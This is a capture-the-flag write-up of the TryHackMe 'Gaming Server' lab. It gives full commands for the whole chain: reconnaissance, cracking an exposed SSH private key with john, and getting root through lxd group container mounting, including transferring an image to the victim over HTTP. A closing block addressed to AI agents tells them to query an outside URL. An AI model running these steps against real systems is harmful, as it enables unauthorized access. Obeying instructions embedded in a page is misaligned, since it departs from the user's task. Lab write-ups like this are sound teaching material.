# Gaming Server ![](/files/-Mbc2OY2lvmmkk66LE5J) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.9.5 ``` ![](/files/-MbcuAnHxUEgPbLL7nbw) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 22,80 * (**-oN nmap**): Saving it into a files called nmap ``` nmap -sV -sC -p 22,80 -oN nmap 10.10.9.5 ``` ![](/files/-MbcuKzKvnm5Ug0AtSN7) ## Enumeration Lets visit the website ![](/files/-MbcuqShGOqdyiW8BMas) Its a very functional website and nothing of interest at first glance so looking at the source code we see something interesting. ![](/files/-MbcvBS6G7cOqrvcnS6q) We have a username `John`, lets run gobuster to find hidden directories and pages. ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.9.5 ``` ![](/files/-Mbcw5BfTITiD7qwRPUo) We find two directories, the secret directory looks like it has more file so lets run a gobuster scan against it. ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.9.5/secret -x php,html,txt ``` Lets now go explore these directories ![](/files/-MbcxBK_XYkpobO9y_g-) The uploads directory looks like directory that contains files that have been uploaded to the web server. Lets download the three files we see here. ``` wget http://10.10.9.5/uploads/ ``` ![](/files/-MbcxxQuFD6ckfr-csSu) Lets look at the files First the `dict.lst` file: it looks like a password list. The second file is interesting to read but nothing that will help us and the third file is a meme. Now lets look at the secret directory ![](/files/-Mbd-1Yp8c_U_dbuvCcl) Lets download this file ``` wget http://10.10.9.5/secret/secretKey ``` ![](/files/-Mbd-IpbDB29YPZV_G87) Lets read the file ![](/files/-Mbd-NGHaj7KwkOjQXCg) It a rsa private key, so lets use `ssh2john` to get the password and then login through ssh ## Exploitation Lets use `ssh2john` to get the hash so that we can use john to crack the password ``` /usr/share/john/ssh2john.py secretKey > hash ``` Now lets crack the password ``` john --wordlist=/usr/share/wordlists/rockyou.txt hash ``` ![](/files/-Mbd-yRKokToCoimBOO3) We found the password, so lets login through ssh, but first we have step ``` chmod 600 secretKey ``` And now we can login ``` ssh -i secretKey john@10.10.9.5 ``` ![](/files/-Mbd0ILrD_H3XANVB_wr) We can now read the `user.txt` file. ![](/files/-Mbd0PX-MafDb593OzaY) ## Privilege Escalation Lets run the id command as we cannot run the sudo command as we do not have the password john. ``` id ``` ![](/files/-Mbd0gFCVlhKwCnzXPl_) Looking closely we can see that john is part of the `lxd group`. lxd is a Linux container manager that can be used to mount the root folder on the host machine. There is an [article ](https://www.hackingarticles.in/lxd-privilege-escalation/)on this topic which talks about and shows us how to privilege escalate to root with the current permissions we have. I highly recommend reading the [article ](https://www.hackingarticles.in/lxd-privilege-escalation/)as they explain it very well. ![](/files/-Mbd22OioNTxuFFESe3l) These are the steps that we have to follow. So first we need to download the alpine image on our machine as I think we can't download files on the victim machine directly , this can be found [here](https://github.com/saghul/lxd-alpine-builder.git). ``` git clone https://github.com/saghul/lxd-alpine-builder.git ``` ![](/files/-Mbd34ERt0gVn82Dn_11) Now we have to change directories into the directory we just cloned and then `run build-alpine`. ``` /build-alpine ``` After running it, a `tar.gz` file is created, now we have to transfer this to the victim machine so lets start a http server so that we can download the file using `wget`. ``` python3 -m http.server 8000 ``` ![](/files/-Mbd3p9dpzojDYWKRiwg) Now lets go to the victim machine and download the file ``` wget http://:8000/alpine-v3.13-x86_64-20210607_2042.tar.gz ``` First change directories into the tmp folder as we are going to place all temporary files here. ![](/files/-Mbd4ZeToN-LvBQl_sMy) Now that the image is built, it can added as an image to `LXD`, we can do that by using this command ``` lxc image import alpine-v3.13-x86_64-20210607_2042.tar.gz --alias myimage ``` ![](/files/-Mbd55zhbVDrzgMaSxcB) Lets check the list of images using this command ``` lxc image list ``` ![](/files/-Mbd5DtvlFj2jgYYjUYq) Now we need to use the following commands to escalate privileges to root ``` lxc init myimage ignite -c security.privileged=true lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true lxc start ignite lxc exec ignite /bin/sh id ``` ![](/files/-Mbd5Wgk_4y9FA7cmX7Q) Now you are root and can read the root flag which you can find here. ![](/files/-Mbd5gr0xVsLw9DItqXR) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/untitled/gaming-server.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.